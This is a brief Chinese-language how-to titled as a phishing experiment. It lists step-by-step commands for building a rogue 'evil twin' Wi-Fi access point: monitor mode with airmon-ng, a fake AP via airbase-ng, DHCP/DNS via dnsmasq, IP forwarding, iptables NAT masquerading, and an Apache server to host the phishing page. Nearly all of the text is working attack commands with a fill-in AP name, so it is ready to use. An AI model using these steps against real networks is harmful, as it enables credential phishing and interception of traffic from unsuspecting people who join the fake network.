钓鱼实验

第一步:

配置dhcp服务器

~leafpad /etc/dnsmasq.conf

第二步:

将网卡设置为监听模式

airmon-ng start wlan0

第三步:

使用airbase-ng创建钓鱼ap

airbase-ng -e ”(输入你想要建立的名称)“ -c (通道) wlan0mon

第四步:

设置默认网关

###~ifconfig at0 10.0.0.1/24 up

第五步:

启用DNS服务器/DHCP服务器

dnsmasq -C /etc/dnsmasq.conf -d

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

第六步:

启用ip转发

echo 1 > /proc/sys/net/ipv4/ip_forward

第七步:

设置ip表

iptables -P FORWARD ACCEPT

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

apache2ctl start